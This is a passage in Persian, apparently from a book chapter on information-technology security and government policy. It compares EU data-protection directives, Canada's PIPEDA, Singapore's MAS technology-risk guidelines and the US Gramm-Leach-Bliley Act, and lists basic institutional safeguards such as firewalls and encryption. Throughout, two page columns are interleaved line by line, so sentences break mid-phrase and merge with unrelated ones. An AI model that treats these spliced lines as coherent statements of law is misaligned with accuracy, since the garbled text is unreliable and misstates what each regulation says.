ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ﻭ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﻻﺯﻡ ﺑﺎﺷــﺪ ﻳــﺎ ﺗــﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷــﻮﺩ ﻛــﻪ ﮔﻤﻨــﺎﻡ ﺑــﺎﻗﻲ ﺑﻤــﺎﻧﻴﻢ".
ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻄﺎﻟﻌـﺎﺕ ﺷـﺒﻜﻪ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺳـﺎﻝ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ" .ﻛﺎﻧﺎﺩﺍ ﺭﻭﻳﻜﺮﺩ ﻣـﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭﭘـﻴﺶ ﮔﺮﻓﺘـﻪ ﺣﺎﻣﻲ ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻫـﺴﺘﻨﺪ ،ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﺑﺮ ﺍﺳﺎﺱ ﻣـﺼﻮﺑﺔ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻛﺎﻫﺶ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻣـﻲﺩﻫﻨـﺪ.
ﺷﺨﺼﻲ ﻭ ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٩٢ﺷﺮﻛﺘﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺯﻣﺎﻧﻴﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ،ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ
ﻣﻮﻇﻔﻨﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺳﺪ ﺭﺍﻩ ﺍﺟﺮﺍﻱ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﺑﺘﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﻧﺪ.
ﺧﺎﺻﻲ ﺑﻴﺎﻧﺪﻳﺸﻨﺪ. ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺳﺆﺍﻝ ﺍﺳﺎﺳﻲ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﻬﺘـﺮﻳﻦ ﺭﻭﺵ
ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﻔﺼﻞﺗﺮﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳـﺖ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ
ﻛــﻪ ﺑــﻪ ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺩﺭ ﺻــﻨﻌﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺍﺻﻞ ﺍﺳﺎﺳﻲ ،ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺿﻮﺍﺑﻂ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ ﮔﺮﺩﺍﻧﻨـﺪﮔﺎﻥ ﻭ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﭘـﺮﺩﺍﺯﺩ .ﻣـﺎﺩﺓ ۴ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞ ﻣـﺸﺨﺺ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴﻞ ﻛﻨﺪ .ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ
ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﻩ ﺧﺪﻣﺎﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ "ﺑﺎﻳﺪ ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺿﻮﺍﺑﻂ ﻣﺮﺗﺒﻂ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺗﺄﺛﻴﺮ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺧـﻮﺩ ﻭ ﺩﺭﺻـﻮﺭﺕ ﻭ ﺣﺘﻲ ﮔﺎﻫﻲ ﺯﻳﺎﻥﺁﻭﺭ ﻫﺴﺘﻨﺪ.
ﻟﺰﻭﻡ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﻲ ﺷﺒﻜﻪ )ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ
ﺩﺭ ﻋﻮﺽ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺤﻤﻴﻞ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺣﻔـﻆ
ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ( ﺍﻧﺠﺎﻡ ﺩﻫﺪ ".ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺍﻣﻨﻴﺖ ﺍﺳﺖ .ﺍﻳـﻦ ﺭﻭﻳﻜـﺮﺩ ﻛـﻪ ﺍﺯ ﻣﻔﻬـﻮﻡ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺣـﺮﻳﻢ
ﻋﻤﻮﻣﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﻧﻮﻉ ﺗﻬﺪﻳـﺪ
ﺧﺼﻮﺻﻲ ﺑﺮﺧﺎﺳﺘﻪ ﺑﻮﺩ ،ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺩﻩ ﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪ ﻭ "ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺧﻄـﺮ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ ﺣﻴﻄـﻪ
ﺷﺨﺼﻲ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻣـﻲﻛﺮﺩﻧـﺪ ﺍﺟﺒـﺎﺭﻱ ﺷـﺪ.
ﻗﺪﺭﺕ ﻭ ﺍﺧﺘﻴﺎﺭ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺳـﺖ ﻫـﺮ ﻧـﻮﻉ ﺗﻐﻴﻴـﺮ ﺍﺯ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺗﻤﺮﻛـﺰ ﺑـﺮ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺍﻗﺘـﺼﺎﺩﻱ ﺍﺳـﺖ.
ﺟﻤﻠﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ".
ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺣـﺮﻳﻢ
ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﻋﻤﻠﻲ ﻣـﻲﺷـﻮﻧﺪ؟ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺍﻳـﻦ ﺧﺼﻮﺻﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻬﺪﺍﺷﺘﻲ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭﺿﻊ
٩٣
ﻣﻮﺭﺩ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺧﺎﺹ ﺩﺍﺭﺩ .ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )(MAS ﻛﺮﺩﻩ ،ﺍﻟﺰﺍﻣﺎﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ
ﻳﻜﺴﺮﻱ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺟﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺩﺭ ﺭﻫﻨﻤﻮﻧﻬﺎﻱ ﮔﻨﺠﺎﻧﺪﻩ ﺍﺳﺖ .ﺳﻨﮕﺎﭘﻮﺭ ﻫﻢ ﺭﻭﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺗﻤﺮﻛـﺰ ﻛـﺮﺩﻩ؛
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ٩٤ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ. ﺍﻣﺎ ﻧﻪ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ -ﺧﻂﻣـﺸﻲﻫـﺎﻱ
ﺍﻳﻦ ﺭﻫﻨﻤﻮﻧﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺍﺭﺗﻘـﺎ ﻭ ﺑﻬﺒـﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫـﺎﻱ ﺻـﺤﻴﺢ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺧـﺼﻮﺹ ﺍﺩﺍﺭﻩﻫـﺎﻱ ﺧـﺪﻣﺎﺕ
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺭﻭﻳﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩ ﺍﻣـﺎ ﻣﺎﻟﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ ﻭ ﻧﻪ ﺗﻬﺪﻳـﺪﺍﺕ
ﺭﻋﺎﻳﺖ ﺁﻥ ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺟﺒﺎﺭﻱ ﻧﺪﺍﺷﺖ .ﺩﺭﻋﻮﺽ ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ .ﻫﻤﭽﻨـﻴﻦ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺑـﺮﺍﻱ ﺗﺒـﺪﻳﻞ
ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎ ﺫﻛﺮ ﺷﺪﻩ" :ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺭﻧﺪ ﺍﻳـﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﮔﺎﻡ ﺑﻪ ﮔـﺎﻡ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺭﻭﻳﻜﺮﺩﻫــﺎ ﺭﺍ ﺩﺭ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﻭ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﻭﻟﺖ ،ﺗﺄﻛﻴـﺪ ﺑـﺮ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﻭﺍﺭﺩ ﻛﻨﻨـﺪ .ﻫـﺮ ﻣﺆﺳـﺴﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺑﻪ ﺟـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﻲ ﺑﺎﺷـﺪ .ﺭﻭﻳﻜـﺮﺩ ﺩﻳﮕـﺮ ﺗﻬﻴـﺔ
ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺧﻂﻣـﺸﻲﻫـﺎ ﺍﺯ ﻃـﺮﻑ MASﺻـﺎﺣﺐ ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺖ .ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﻣﻜﻤـﻞ ﻳﻜـﺪﻳﮕﺮ
ﻣﻨﺎﻓﻊ ﻭﻳﮋﻩﺍﻱ ﺧﻮﺍﻫﺪ ﺷﺪ ،ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ ﺑﺎﺷﻨﺪ.
ﺗﻼﺵ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮕﻲ ﺑﺎ ﺧﻂﻣﺸﻲﻫﺎ ﺗـﺸﻮﻳﻖ ﺷـﺪﻩﺍﻧـﺪ ".ﺍﻳـﻦ ﺍﺭﻭﭘﺎ ﺍﻋﻤﺎﻝ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ
ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺑﻪ ﺣـﺴﺎﺏ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﻨﺪ ﺁﻏﺎﺯ ﻛـﺮﺩﻩ
ﺑﻴﺎﻳﻨﺪ .ﻓﻬﺮﺳﺖ ﺫﻳﻞ ﺩﺭ ﻣﻮﺭﺩ ﺷﻴﻮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﺳﺖ .ﻣﺎﺩﺓ ۱۷ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ
"ﺑﺎﻳﺪ"ﻫﺎﻳﻲ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ: ﺩﺍﺭﻧﺪﮔﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺑـﻪ • ﺍﺯ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﺨﺮﻳﺐ ،ﺗﻐﻴﻴﺮ ،ﺍﻓـﺸﺎﺳﺎﺯﻱ ﻳـﺎ ﺩﺳﺘﺮﺳـﻲ
ﺑﺎﻻﺗﺮﻳﻦ ﺩﺭﺟﺔ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺠﻬﺰ ﺷﻮﻧﺪ ،ﻭ ﺩﺭ ﺟﻬﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ )ﺑﻮﻳﮋﻩ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺷـﺎﻣﻞ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﻣﻴـﺎﻥ
ﺷﺒﻜﻪﻫﺎ ﺑﺎﺷﺪ( ﺍﻗﺪﺍﻣﺎﺕ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﻓﻨﻮﻥ ﻣﻨﺎﺳﺐ ﺭﺍ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ.
92 Personal Information Protection And ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻫﻤﭽﻨﻴﻦ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ "ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ
Electronic Documents Act
93 Monetary Authority of Singapore ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻃﺒﻴﻌﻲ ﭘـﺮﺩﺍﺯﺵ
94 Technology Risk Management Guideline
٢٥٣ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻛﻔﺎﻳــﺖ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ،ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋــﺎﺕ • ﺗﻘﻮﻳﺖ ،ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺩﻳﮕﺮ ﺍﺯ ﻃﺮﻑ
ﺧﺮﻳﺪﺍﺭﺍﻥ ﻭ ﺳﺎﻳﺮ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻨﺘﺮﻝ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ. ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺳﻴﺴﺘﻢ ﮔﺎﻡ ﺑﺮﺩﺍﺭﻧﺪ؛
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻃﺮﺍﺣـﻲ ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﻭﻟﻴﻪ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ﺑﺎﻳـﺪ •
ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺎ ﺣــﺴﺎﺳﻴﺖ ،ﭘﻴﭽﻴــﺪﮔﻲ ،ﻭ ﺣــﻮﺯﺓ ﺗﺄﺛﻴﺮﮔــﺬﺍﺭﻱ ﻓﻮﺭﹰﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻬـﺎﺟﻤﻴﻦ ﺩﺭ
ﺍﻃﻼﻋﺎﺕ ﻣﺘﻨﺎﺳﺐ ﻫـﺴﺘﻨﺪ .ﺑـﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﻪ ﺩﺳـﺘﺔ ﺣﺪ ﻭﺳﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ؛
ﻭﺳﻴﻌﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺑﻜﺎﺭ
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺩﺭ ﻣﻴـﺎﻥ ﺷـﺒﻜﻪﻫـﺎﻱ ﺩﺍﺧﻠـﻲ ﻭ •
ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ﺧﺎﺭﺟﻲ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻴـﺎﻥ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ
ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ • ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﺠﺰﺍ ﻫﺴﺘﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ؛ ﻭ
)ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ(؛ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺎﻳﺪ ﻧﺼﺐ ﻭ ﺍﺟﺮﺍ ﮔﺮﺩﻧﺪ. •
ﻣﺤﺪﻭﺩﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛ •
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ؛ • ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﭘﻴﺶ ﮔﺮﻓﺘﻪ ﻛﻪ ﺑﺮ ﻓﺮﺁﻳﻨﺪﻫﺎ
ﺗﻐﻴﻴﺮ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ؛ • ﺗﻜﻴﻪ ﺩﺍﺭﺩ ﻭ ﻧﻪ ﺑﺮ ﺷﻴﻮﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗـﺎﻧﻮﻥ
٩٥
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻭﮔﺎﻧﻪ )ﺳﻴﺎﺳﺖ ﺟﺪﺍﺳﺎﺯﻱ ﻭﻇﺎﻳﻒ • ﻣﺪﺭﻥﺳﺎﺯﻱ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ )ﻣـﺼﻮﺏ ﺳـﺎﻝ ۱۹۹۹؛ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ
Gramm - Leach - Biley ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﺻـﻠﻲ ﺁﻥ ﺩﺭ ﻛﻨﮕـﺮﻩ ،ﻣـﺼﻮﺑﺔ
ﻭ ﺑﺮﺭﺳــﻲ ﺳــﻮﺍﺑﻖ( ﺑــﺮﺍﻱ ﻛﺎﺭﻣﻨــﺪﺍﻧﻲ ﻛــﻪ ﺑــﻪ ﺍﻃﻼﻋــﺎﺕ
ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ "ﻫﺮ ﻣﺆﺳﺴﻪ ﻣـﺎﻟﻲ ﻣـﺴﺌﻮﻟﻴﺖ
ﺧﺮﻳﺪﺭﺍﻥ ،ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ؛
ﻣﺪﺍﻭﻣﻲ ﺑﺮﺍﻱ ﺍﺣﺘﺮﺍﻡ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺭﺩ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﻧﻔﻮﺫ٩٦؛ •
ﺑﺎﻳﺪ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻭ ﻏﻴﺮﻋﻤـﻮﻣﻲ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻧﻔﻮﺫ٩٧؛ ﻭ •
ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻛﻨﺪ ".ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ،ﮔﺮﺩﺍﻧﻨﺪﮔﺎﻥ
ﭘﻴﺶﺑﻴﻨـﻲ ﺗـﺪﺍﺑﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﺨﺮﻳـﺐ، •
ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺗـﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻣـﺪﻳﺮﻳﺘﻲ ﻭ ﻓﻨـﻲ ﻭ
